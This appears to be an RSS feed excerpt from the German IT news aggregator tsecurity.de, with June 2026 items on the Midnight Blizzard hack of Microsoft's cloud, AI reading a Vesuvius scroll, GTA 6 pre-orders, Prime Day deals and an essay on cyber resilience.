<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Hacker der staatlichen Gruppe Midnight Blizzard-Hacker durchforsteten gezielt Nachrichten von Führungskräften oder Sicherheitsexperten in ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsofts Midnight Blizzard Cloud-Hack und die Schatten-ITBorns IT - BornCity]]></title>
<description><![CDATA[Die Hacker der staatlichen Gruppe Midnight Blizzard-Hacker durchforsteten gezielt Nachrichten von Führungskräften oder Sicherheitsexperten in ...]]></description>
<link>https://tsecurity.de/de/3630316/hacking/microsofts-midnight-blizzard-cloud-hack-und-die-schatten-itborns-it-borncity/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3630316/hacking/microsofts-midnight-blizzard-cloud-hack-und-die-schatten-itborns-it-borncity/</guid>
<pubDate>Sun, 28 Jun 2026 00:51:40 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die <b>Hacker</b> der staatlichen Gruppe Midnight Blizzard-<b>Hacker</b> durchforsteten gezielt Nachrichten von Führungskräften oder Sicherheitsexperten in ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsofts Midnight Blizzard Cloud-Hack und die Schatten-IT]]></title>
<description><![CDATA[Heute noch eine "vogelwilde Story", wie es bei Microsoft in der Azure Cloud zugegangen ist, als diese von Midnight Blizzard gehackt wurde. Ich habe die Grundzüge zwar irgendwie im Blog in diversen Beiträgen nachgezeichnet. Aber was für ein Desaster und … Weiterlesen →
Quelle]]></description>
<link>https://tsecurity.de/de/3630276/it-nachrichten/microsofts-midnight-blizzard-cloud-hack-und-die-schatten-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3630276/it-nachrichten/microsofts-midnight-blizzard-cloud-hack-und-die-schatten-it/</guid>
<pubDate>Sun, 28 Jun 2026 00:17:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Heute noch eine "vogelwilde Story", wie es bei Microsoft in der Azure Cloud zugegangen ist, als diese von Midnight Blizzard gehackt wurde. Ich habe die Grundzüge zwar irgendwie im Blog in diversen Beiträgen nachgezeichnet. Aber was für ein Desaster und … <a href="https://borncity.com/blog/2026/06/28/microsofts-cloud-der-midnight-blizzard-hack-und-die-schatten-it/">Weiterlesen <span class="meta-nav">→</span></a>
<p><a href="https://borncity.com/blog/2026/06/28/microsofts-cloud-der-midnight-blizzard-hack-und-die-schatten-it/" rel="nofollow">Quelle</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Scroll Burned in 79 AD Volcanic Eruption Finally Deciphered Using AI]]></title>
<description><![CDATA[When Mt. Vesuvius erupted in 79 A.D., it buried hundreds of papyrus
scrolls. They were rediscovered in the mid-1700s, remembers Smithsonian magazine, "the only
surviving collection of its kind from the Greco-Roman
world..." 



"But when scholars tried to unroll them, the carbonized manuscripts
c...]]></description>
<link>https://tsecurity.de/de/3630131/it-security-nachrichten/scroll-burned-in-79-ad-volcanic-eruption-finally-deciphered-using-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3630131/it-security-nachrichten/scroll-burned-in-79-ad-volcanic-eruption-finally-deciphered-using-ai/</guid>
<pubDate>Sat, 27 Jun 2026 21:52:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[When Mt. Vesuvius erupted in 79 A.D., it buried hundreds of papyrus
scrolls. They were rediscovered in the mid-1700s, remembers Smithsonian magazine, "the only
surviving collection of its kind from the Greco-Roman
world..." 



"But when scholars tried to unroll them, the carbonized manuscripts
crumbled to dust."








Every generation that followed faced the same dilemma: They could wait for
technology to advance, abandoning hope of reading the ancient texts
in their own lifetime. Or they could try to open the scrolls
themselves — and risk destroying them. 


In recent years, researchers have settled on a third option. Using
advanced imaging and artificial intelligence, they're deciphering
the scrolls without needing to unroll them at all. 



The Vesuvius Challenge
has accelerated the process by turning it into a public competition,
complete with cash prizes. In 2023, a student won $40,000 for
deciphering a
single word — "purple" — from an unopened scroll. Later,
contestants would identify 2,000 Greek characters from one scroll ($700,000) and the title of another ($60,000). Now, for the very first time,
researchers have recovered all
surviving text from a single scroll. The nearly five-foot-long
segment includes roughly 20 columns of ancient Greek philosophy,
accessible for the first time in nearly 2,000 years. 


"The tech actually does look like magic, but it's not," Brent
Seales, a computer scientist at the University of Kentucky, said
at a press
conference. (The article points out that Seales partnered with two Silicon Valley investors in 2023 to launch the Vesuvius Challenge, and is now hailing "the restoration of lost voices from the ancient world."

Seales has been working on virtually unwrapping the
scrolls since the early 2000s. The process involved imaging the
bundles of papyrus using technology similar to CT scanners, isolating
thin layers and then stitching them together.... "We've developed
a systematic and a repeatable approach," Seales told the audience.
"Now it's only a matter of time until we read all of the
scrolls."

<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Scroll+Burned+in+79+AD+Volcanic+Eruption+Finally+Deciphered+Using+AI%3A+https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F06%2F27%2F1825220%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F06%2F27%2F1825220%2Fscroll-burned-in-79-ad-volcanic-eruption-finally-deciphered-using-ai%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://science.slashdot.org/story/26/06/27/1825220/scroll-burned-in-79-ad-volcanic-eruption-finally-deciphered-using-ai?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ends tonight! These Amazon device deals are at record-low prices before Prime Day ends — I've got Kindles, Fire TV Stick, Blink, Echo, and more]]></title>
<description><![CDATA[You've got until Midnight tonight to score these record-low prices on popular Amazon devices.]]></description>
<link>https://tsecurity.de/de/3627717/it-nachrichten/ends-tonight-these-amazon-device-deals-are-at-record-low-prices-before-prime-day-ends-ive-got-kindles-fire-tv-stick-blink-echo-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627717/it-nachrichten/ends-tonight-these-amazon-device-deals-are-at-record-low-prices-before-prime-day-ends-ive-got-kindles-fire-tv-stick-blink-echo-and-more/</guid>
<pubDate>Fri, 26 Jun 2026 16:32:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[You've got until Midnight tonight to score these record-low prices on popular Amazon devices.]]></content:encoded>
</item>
<item>
<title><![CDATA[I've hand-picked the best last-minute Prime Day deals at Amazon UK — 105+ offers on TVs, appliances, wearables, gaming, and top tech gadgets I'd buy before the sale ends]]></title>
<description><![CDATA[With this year's Amazon Prime Day sale set to end at midnight, I've rounded up over 100 of the best deals that are genuinely worth buying before they sell out.]]></description>
<link>https://tsecurity.de/de/3627150/it-nachrichten/ive-hand-picked-the-best-last-minute-prime-day-deals-at-amazon-uk-105-offers-on-tvs-appliances-wearables-gaming-and-top-tech-gadgets-id-buy-before-the-sale-ends/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627150/it-nachrichten/ive-hand-picked-the-best-last-minute-prime-day-deals-at-amazon-uk-105-offers-on-tvs-appliances-wearables-gaming-and-top-tech-gadgets-id-buy-before-the-sale-ends/</guid>
<pubDate>Fri, 26 Jun 2026 13:17:40 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[With this year's Amazon Prime Day sale set to end at midnight, I've rounded up over 100 of the best deals that are genuinely worth buying before they sell out.]]></content:encoded>
</item>
<item>
<title><![CDATA[Grand Theft Auto VI pre-orders open, but don’t expect a physical copy]]></title>
<description><![CDATA[The blockbuster launch is expected to dwarf the box office takings of the year’s biggest movies with one industry analyst predicting it could make $1bn within an hourIt is, quite simply, the most anticipated piece of entertainment since the Star Wars prequels and now, at last, you can reserve a c...]]></description>
<link>https://tsecurity.de/de/3624895/it-nachrichten/grand-theft-auto-vi-pre-orders-open-but-dont-expect-a-physical-copy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624895/it-nachrichten/grand-theft-auto-vi-pre-orders-open-but-dont-expect-a-physical-copy/</guid>
<pubDate>Thu, 25 Jun 2026 16:32:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The blockbuster launch is expected to dwarf the box office takings of the year’s biggest movies with one industry analyst predicting it could make $1bn within an hour</p><p>It is, quite simply, the most anticipated piece of entertainment since the Star Wars prequels and now, at last, you can reserve a copy. At midnight last night, Rockstar opened preorders on Grand Theft Auto VI, the latest title in the epic open-world gangster adventure series, five months before its 19 November release date on PS5 and Xbox Series S/X.</p><p>Prices have also been confirmed, with the standard edition costing $80 in the US, £70 in the UK, and €80 in Europe. An Ultimate Edition (£90/€100/$100) will include exclusive in-game cars, clothes and weapons – the developer has confirmed that there will also be in-game stores that are only open to Ultimate owners. Anyone who pre-orders the game will get a Vintage Vice City pack filled with 80s apparel and other nostalgic items, which look to be straight out of Don Johnson’s Miami Vice wardrobe.</p> <a href="https://www.theguardian.com/games/2026/jun/25/grand-theft-auto-vi-pre-orders-open">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple just increased prices, now is the time to grab Prime Day deals from $11]]></title>
<description><![CDATA[Day 3 of Prime Day 2026 is underway, and now is the time to snap up some of the lowest prices of the year before Apple's Mac and iPad price increases hit Amazon.Grab Apple Prime Day deals now before price increases take effect - Image credit: AppleThe third day of Prime Day sees a return of popul...]]></description>
<link>https://tsecurity.de/de/3624774/ios-mac-os/apple-just-increased-prices-now-is-the-time-to-grab-prime-day-deals-from-11/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624774/ios-mac-os/apple-just-increased-prices-now-is-the-time-to-grab-prime-day-deals-from-11/</guid>
<pubDate>Thu, 25 Jun 2026 15:51:20 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Day 3 of <a href="https://appleinsider.com/deals/amazon-prime-day">Prime Day 2026</a> is underway, and now is the time to snap up some of the lowest prices of the year before Apple's Mac and iPad price increases hit Amazon.<br><br><div><img src="https://photos5.appleinsider.com/gallery/68066-143492-prime-day-apple-deals-last-call-xl.jpg" alt="AppleInsider Prime Day Apple deals end soon banner, with colorful gradient background, Amazon boxes, and Apple products including iPad, MacBook, AirPods, Apple Watch, headphones, and LG OLED monitor" height="720"><br><span>Grab Apple Prime Day deals now before price increases take effect - Image credit: Apple</span></div><br>The <a href="https://www.amazon.com/primeday?discounts-widget=%22%7B%5C%22state%5C%22%3A%7B%5C%22refinementFilters%5C%22%3A%7B%5C%22brands%5C%22%3A%5B%5C%22110955%7CApple%5C%22%5D%7D%7D%2C%5C%22version%5C%22%3A1%7D%22&amp;tag=apinsiderdeals-20" rel="nofollow" target="_blank">third day of Prime Day</a> sees a return of popular Apple deals, with AirPods Max 2 still available <a href="https://www.amazon.com/dp/B0GSS4SGZR/?tag=aidealarticle-20" rel="nofollow" target="_blank">at $399</a>, but only the Midnight color remains.<br><br><a href="https://www.amazon.com/primeday?discounts-widget=%22%7B%5C%22state%5C%22%3A%7B%5C%22refinementFilters%5C%22%3A%7B%5C%22brands%5C%22%3A%5B%5C%22110955%7CApple%5C%22%5D%7D%7D%2C%5C%22version%5C%22%3A1%7D%22&amp;tag=apinsiderdeals-20" rel="nofollow" class="deal-highlight">Get Prime Day deals</a><br><br><br> <a href="https://appleinsider.com/articles/26/06/25/apple-just-increased-prices-now-is-the-time-to-grab-prime-day-deals-from-11?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244777?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Surviving the Mythos Era: Richard Bejtlich on the Case for NDR]]></title>
<description><![CDATA[Despite the abundance of telemetry at analysts’ disposal, many security operations teams struggle to answer a few basic questions during incident investigation: What happened? What evidence do we have? How do we know we’re seeing it all, in context? Answering…
Read more →
The post Surviving the M...]]></description>
<link>https://tsecurity.de/de/3624483/it-security-nachrichten/surviving-the-mythos-era-richard-bejtlich-on-the-case-for-ndr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624483/it-security-nachrichten/surviving-the-mythos-era-richard-bejtlich-on-the-case-for-ndr/</guid>
<pubDate>Thu, 25 Jun 2026 14:23:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Despite the abundance of telemetry at analysts’ disposal, many security operations teams struggle to answer a few basic questions during incident investigation: What happened? What evidence do we have? How do we know we’re seeing it all, in context? Answering…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/surviving-the-mythos-era-richard-bejtlich-on-the-case-for-ndr/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/surviving-the-mythos-era-richard-bejtlich-on-the-case-for-ndr/">Surviving the Mythos Era: Richard Bejtlich on the Case for NDR</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Surviving the Mythos Era: Richard Bejtlich on the Case for NDR]]></title>
<description><![CDATA[Despite the abundance of telemetry at analysts’ disposal, many security operations teams struggle to answer a few basic questions during incident investigation: What happened? What evidence do we have? How do we know we’re seeing it all, in context?

Answering these questions requires teams to go...]]></description>
<link>https://tsecurity.de/de/3624440/it-security-nachrichten/surviving-the-mythos-era-richard-bejtlich-on-the-case-for-ndr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624440/it-security-nachrichten/surviving-the-mythos-era-richard-bejtlich-on-the-case-for-ndr/</guid>
<pubDate>Thu, 25 Jun 2026 14:08:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Despite the abundance of telemetry at analysts’ disposal, many security operations teams struggle to answer a few basic questions during incident investigation: What happened? What evidence do we have? How do we know we’re seeing it all, in context?

Answering these questions requires teams to go beyond alerts, the most common basis for initial triage. But investigations (and their outcomes)]]></content:encoded>
</item>
<item>
<title><![CDATA[Compulsion Games begins an unknown number of layoffs at the studio behind South of Midnight and We Happy Few]]></title>
<description><![CDATA[The developers behind South of Midnight and We Happy Few face ugly news.]]></description>
<link>https://tsecurity.de/de/3624165/windows-tipps/compulsion-games-begins-an-unknown-number-of-layoffs-at-the-studio-behind-south-of-midnight-and-we-happy-few/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3624165/windows-tipps/compulsion-games-begins-an-unknown-number-of-layoffs-at-the-studio-behind-south-of-midnight-and-we-happy-few/</guid>
<pubDate>Thu, 25 Jun 2026 12:55:51 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The developers behind South of Midnight and We Happy Few face ugly news.]]></content:encoded>
</item>
<item>
<title><![CDATA[GTA 6 Pre-orders are going live: All the places to buy GTA 6 and Standard vs Ultimate edition explained]]></title>
<description><![CDATA[GTA 6 is now available to pre-order from midnight here's where you can grab it]]></description>
<link>https://tsecurity.de/de/3623061/windows-tipps/gta-6-pre-orders-are-going-live-all-the-places-to-buy-gta-6-and-standard-vs-ultimate-edition-explained/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3623061/windows-tipps/gta-6-pre-orders-are-going-live-all-the-places-to-buy-gta-6-and-standard-vs-ultimate-edition-explained/</guid>
<pubDate>Thu, 25 Jun 2026 01:25:01 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[GTA 6 is now available to pre-order from midnight here's where you can grab it]]></content:encoded>
</item>
<item>
<title><![CDATA[Preorders for the Long-Awaited GTA 6 Go Live at Midnight]]></title>
<description><![CDATA[It's been a 13-year wait for Grand Theft Auto 6, but preorders for the blockbuster game go live tomorrow. Here's what you should know.]]></description>
<link>https://tsecurity.de/de/3622396/it-nachrichten/preorders-for-the-long-awaited-gta-6-go-live-at-midnight/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622396/it-nachrichten/preorders-for-the-long-awaited-gta-6-go-live-at-midnight/</guid>
<pubDate>Wed, 24 Jun 2026 20:18:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It's been a 13-year wait for Grand Theft Auto 6, but preorders for the blockbuster game go live tomorrow. Here's what you should know.]]></content:encoded>
</item>
<item>
<title><![CDATA[The GTA 6 editions aren't what we expected — here's what's included in the Standard and Ultimate]]></title>
<description><![CDATA[If you're on the fence about which GTA edition you plan to pre-order come midnight on June 25, here's everything you need to know about both.]]></description>
<link>https://tsecurity.de/de/3622149/it-nachrichten/the-gta-6-editions-arent-what-we-expected-heres-whats-included-in-the-standard-and-ultimate/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622149/it-nachrichten/the-gta-6-editions-arent-what-we-expected-heres-whats-included-in-the-standard-and-ultimate/</guid>
<pubDate>Wed, 24 Jun 2026 18:32:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[If you're on the fence about which GTA edition you plan to pre-order come midnight on June 25, here's everything you need to know about both.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI helps read papyrus scroll burnt to crisp during Vesuvius eruption]]></title>
<description><![CDATA[Previously hidden text revealed without unrolling scroll discusses stoic philosophy on ethics, art and human behaviourThe surviving part of an ancient scroll that was burnt to a crisp when Mount Vesuvius erupted nearly 2,000 years ago has been virtually unwrapped and read with help from artificia...]]></description>
<link>https://tsecurity.de/de/3622017/ai-nachrichten/ai-helps-read-papyrus-scroll-burnt-to-crisp-during-vesuvius-eruption/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622017/ai-nachrichten/ai-helps-read-papyrus-scroll-burnt-to-crisp-during-vesuvius-eruption/</guid>
<pubDate>Wed, 24 Jun 2026 17:48:12 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Previously hidden text revealed without unrolling scroll discusses stoic philosophy on ethics, art and human behaviour</p><p>The surviving part of an ancient scroll that was burnt to a crisp when Mount Vesuvius erupted nearly 2,000 years ago has been virtually unwrapped and read with help from artificial intelligence.</p><p>Researchers uncovered 20 columns of previously hidden text covering more than a metre of charred papyrus without physically unrolling the scroll. The work discusses stoic philosophy on ethics, art and human behaviour and dates to the second or late-third century BC.</p> <a href="https://www.theguardian.com/technology/2026/jun/24/ai-read-papyrus-scroll-burnt-vesuvius-eruption">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rockstar finally reveals pricing for Grand Theft Auto 6]]></title>
<description><![CDATA[Grand Theft Auto 6 will cost $80 when pre-orders open on June 25th at midnight.]]></description>
<link>https://tsecurity.de/de/3621240/it-nachrichten/rockstar-finally-reveals-pricing-for-grand-theft-auto-6/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621240/it-nachrichten/rockstar-finally-reveals-pricing-for-grand-theft-auto-6/</guid>
<pubDate>Wed, 24 Jun 2026 14:03:02 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Grand Theft Auto 6 will cost $80 when pre-orders open on June 25th at midnight.]]></content:encoded>
</item>
<item>
<title><![CDATA[GTA VI finally gets a price tag]]></title>
<description><![CDATA[We finally have a price for Grand Theft Auto VI: $79.99. That gets you the standard edition of the game, while the Ultimate Edition will set you back $99.99. Preorders start at midnight tonight, local time, when you'll be able to reserve a copy on PS5 or Xbox Series X/S. There's been a lot of […]]]></description>
<link>https://tsecurity.de/de/3621028/it-nachrichten/gta-vi-finally-gets-a-price-tag/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621028/it-nachrichten/gta-vi-finally-gets-a-price-tag/</guid>
<pubDate>Wed, 24 Jun 2026 12:48:23 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[We finally have a price for Grand Theft Auto VI: $79.99. That gets you the standard edition of the game, while the Ultimate Edition will set you back $99.99. Preorders start at midnight tonight, local time, when you'll be able to reserve a copy on PS5 or Xbox Series X/S. There's been a lot of […]]]></content:encoded>
</item>
<item>
<title><![CDATA[GTA 6 pre-orders go live at midnight local time as Rockstar unveils the Ultimate Edition that 'amplifies' the experience with exclusive items]]></title>
<description><![CDATA[The Standard Edition will cost $79.99]]></description>
<link>https://tsecurity.de/de/3621021/it-nachrichten/gta-6-pre-orders-go-live-at-midnight-local-time-as-rockstar-unveils-the-ultimate-edition-that-amplifies-the-experience-with-exclusive-items/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621021/it-nachrichten/gta-6-pre-orders-go-live-at-midnight-local-time-as-rockstar-unveils-the-ultimate-edition-that-amplifies-the-experience-with-exclusive-items/</guid>
<pubDate>Wed, 24 Jun 2026 12:48:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Standard Edition will cost $79.99]]></content:encoded>
</item>
<item>
<title><![CDATA[Database vendors pitch themselves as the cure for runaway AI costs]]></title>
<description><![CDATA[Pinecone and Tiger Data say smarter data plumbing can cut token use and tame agentic workloads]]></description>
<link>https://tsecurity.de/de/3620947/it-nachrichten/database-vendors-pitch-themselves-as-the-cure-for-runaway-ai-costs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620947/it-nachrichten/database-vendors-pitch-themselves-as-the-cure-for-runaway-ai-costs/</guid>
<pubDate>Wed, 24 Jun 2026 12:17:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Pinecone and Tiger Data say smarter data plumbing can cut token use and tame agentic workloads]]></content:encoded>
</item>
<item>
<title><![CDATA[Grab Apple's 15-inch MacBook Air M4 for just $949 today only]]></title>
<description><![CDATA[B&H's flash Deal Zone drops a blowout 15-inch MacBook Air configuration to a record-low $949, with free 2-day shipping.For 24 hours only, get a MacBook Air 15-inch for just $949 - Image credit: AppleFor 24 hours only, pick up Apple's last-gen M4 MacBook Air 15-inch for $949 at Apple Authorized Re...]]></description>
<link>https://tsecurity.de/de/3620194/ios-mac-os/grab-apples-15-inch-macbook-air-m4-for-just-949-today-only/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620194/ios-mac-os/grab-apples-15-inch-macbook-air-m4-for-just-949-today-only/</guid>
<pubDate>Wed, 24 Jun 2026 06:24:13 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[B&amp;H's flash Deal Zone drops a <a href="https://prices.appleinsider.com/product/macbook-air-15-inch-m4/MW1L3LL/A">blowout 15-inch MacBook Air</a> configuration to a record-low $949, with free 2-day shipping.<br><br><div><img src="https://photos5.appleinsider.com/gallery/68046-143447-15-inch-macbook-air-949-bh-deal-xl.jpg" alt="Open MacBook laptop with abstract blue screen pattern, set against a dark glowing background, with bold white text reading 15 inch Air 949 dollars across the center" height="720"><br><span>For 24 hours only, get a MacBook Air 15-inch for just $949 - Image credit: Apple</span></div><br>For 24 hours only, pick up Apple's last-gen M4 MacBook Air 15-inch <strong><a href="https://www.bhphotovideo.com/c/product/1883968-REG/apple_mw1l3ll_a_15_macbook_air_m4.html/BI/1717/KBID/2301/SID/da-maca-15in-m4-949-dz-062426" rel="nofollow" target="_blank">for $949</a></strong> at Apple Authorized Reseller B&amp;H Photo. Available in your choice of <a href="https://www.bhphotovideo.com/c/product/1883968-REG/apple_mw1l3ll_a_15_macbook_air_m4.html/BI/1717/KBID/2301/SID/da-maca-15in-m4-949-dz-062326" rel="nofollow" target="_blank">Midnight</a> or <a href="https://www.bhphotovideo.com/c/product/1883955-REG/apple_mc7a4ll_a_15_macbook_air_m4.html/BI/1717/KBID/2301/SID/da-maca-15in-m4-949-dz-062426" rel="nofollow" target="_blank">Sky Blue</a>, this laptop originally retailed for $1,199.<br><br><a href="https://www.bhphotovideo.com/c/product/1883968-REG/apple_mw1l3ll_a_15_macbook_air_m4.html/BI/1717/KBID/2301/SID/da-maca-15in-m4-949-dz-btn-062326" rel="nofollow" class="deal-highlight">Buy 15" MacBook Air M4 for $949</a><br><br><br> <a href="https://appleinsider.com/articles/26/06/24/grab-apples-15-inch-macbook-air-m4-for-just-949-today-only?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244754?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Your Breach Plan Is Delusional]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:22 Cybersecurity teams often repeat the phrase: “It’s not if, it’s when.”

But according to this conversation, many organizations still behave as if breaches are completely preventable. Budgets continue flowing into detection tools,...]]></description>
<link>https://tsecurity.de/de/3619754/it-security-video/your-breach-plan-is-delusional/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619754/it-security-video/your-breach-plan-is-delusional/</guid>
<pubDate>Wed, 24 Jun 2026 00:18:27 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:22 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/bFg-BnLuknQ?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Cybersecurity teams often repeat the phrase: “It’s not if, it’s when.”<br />
<br />
But according to this conversation, many organizations still behave as if breaches are completely preventable. Budgets continue flowing into detection tools, dashboards, and perimeter defenses while resilience, continuity, and recovery planning receive far less attention.<br />
<br />
This discussion reframes the real objective of security leadership. Success is not simply blocking every attacker. Success is making sure the organization can continue operating after an incident occurs.<br />
<br />
That shift changes how teams think about architecture, response planning, backups, operational continuity, and executive priorities.<br />
<br />
Modern cybersecurity may depend less on appearing secure and more on surviving failure gracefully when prevention inevitably breaks down.<br />
<br />
If attackers got into your environment tomorrow, would the business still function on Monday?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#IncidentResponse #CyberResilience #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cybersecurity is no longer about protection. It’s about survival.]]></title>
<description><![CDATA[For years, cybersecurity professionals have been repeating the same warning: Every company will eventually be breached.



Fine. Let’s accept that.



Then why do so many organizations still behave as if the near sole purpose of cybersecurity is to prevent the breach from ever happening?



That ...]]></description>
<link>https://tsecurity.de/de/3617413/it-security-nachrichten/cybersecurity-is-no-longer-about-protection-its-about-survival/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617413/it-security-nachrichten/cybersecurity-is-no-longer-about-protection-its-about-survival/</guid>
<pubDate>Tue, 23 Jun 2026 09:08:41 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>For years, cybersecurity professionals have been repeating the same warning: Every company will eventually be breached.</p>



<p>Fine. Let’s accept that.</p>



<p>Then why do so many organizations still behave as if the near sole purpose of cybersecurity is to prevent the breach from ever happening?</p>



<p>That is the contradiction at the heart of modern cybersecurity strategy. We say, “Assume the breach,” but we budget, govern, architect, and rehearse as if the wall will hold. We tell boards compromise is inevitable, then ask for more money to make the wall higher, thicker, smarter, and more AI-enabled. We buy more tools. We tune more dashboards. We polish the gate. We call it maturity. And then, when the wall of our gloriously protected city cracks, it turns out that half the city has no food, no command structure, no working roads, no backup water supply, and no idea who is supposed to organize the response.</p>



<p>That is not security. Or at least, it should no longer be understood as security.</p>



<h2 class="wp-block-heading">Pure prevention is the past</h2>



<p>The age of having a pure prevention focus has ended. Not because prevention is dead. That would be a childish argument. WAFs matter. MFA matters. Patching matters. Hardening matters. The familiar machinery still matters: hardened systems, sane configurations, patching discipline, identity controls, endpoint visibility, email defenses, logging, segmentation, and the rest of the security plumbing. Nobody serious is suggesting we kick open the gates and invite the attackers in.</p>



<p>But prevention alone is no longer a credible operating model. It no longer works as the primary focal point. The strategic question is no longer simply, “Can we stop the attack?” The better question is, “Can the organization continue to function when the attack succeeds?” That is the shift. Cybersecurity is not primarily about protection anymore. It is about survival.</p>



<p>Survival means breach readiness. It means continuity. It means recoverability. It means identity restoration when the identity provider is compromised. It means knowing which systems can be rebuilt cleanly and which ones are held together by duct tape, vendor promises, and one engineer we are all praying will never retire. It means backup integrity, crisis governance, legal and communications alignment, supplier fallback, product resilience, clean deployment pipelines, tested incident response, and executives who understand that cyber risk is not a quarterly awareness slide. Survival means designing organizations that can absorb breach, disruption, AI acceleration, supplier failure, regulatory pressure, and systemic shock without collapsing entirely.</p>



<p>This is not just philosophy. The world is moving there whether companies enjoy the view or not.</p>

